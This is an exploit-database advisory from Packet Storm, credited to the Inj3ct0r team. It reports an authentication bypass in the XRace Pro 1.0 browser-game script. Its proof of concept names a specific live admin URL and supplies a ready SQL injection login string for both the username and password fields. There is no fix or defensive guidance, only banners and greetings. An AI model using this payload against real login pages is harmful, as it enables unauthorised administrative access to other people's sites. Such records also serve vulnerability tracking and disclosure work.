XRace Pro 1.0 SQL Injection

2015-12-15T00:00:00
ID PACKETSTORM:134832
Type packetstorm
Reporter indoushka
Modified 2015-12-15T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1   
1 /' \ __ /'__`\ /\ \__ /'__`\ 0   
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1   
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0   
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1   
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0   
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1   
1 \ \____/ >> Exploit database separated by exploit 0   
0 \/___/ type (local, remote, DoS, etc.) 1   
1 1   
0 [+] Site : http://0day.today 0   
1 [+] Support e-mail : submit[at]inj3ct0r.com 1   
0 0   
1 #################################### 1   
0 I'm indoushka member from Inj3ct0r Team 1   
1 #################################### 0   
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
| # Title : XRace Pro v1.0 Auth By Pass Vulnerability  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Tested on: windows 8.1 Français V.(Pro)  
| # Vendor : http://codecanyon.net/item/xrace-pro-create-your-own-browser-game/8730213  
========================================================================  
  
Poc :  
  
http://xrace.guldhammer.info/admin/  
  
User : 1'or'1'='1  
Pass : 1'or'1'='1  
  
Greetz :   
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com * http://is-sec.org/cc/  
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * http://dz.parti-pirate.com  
---------------------------------------------------------------------------------------------------------------  
`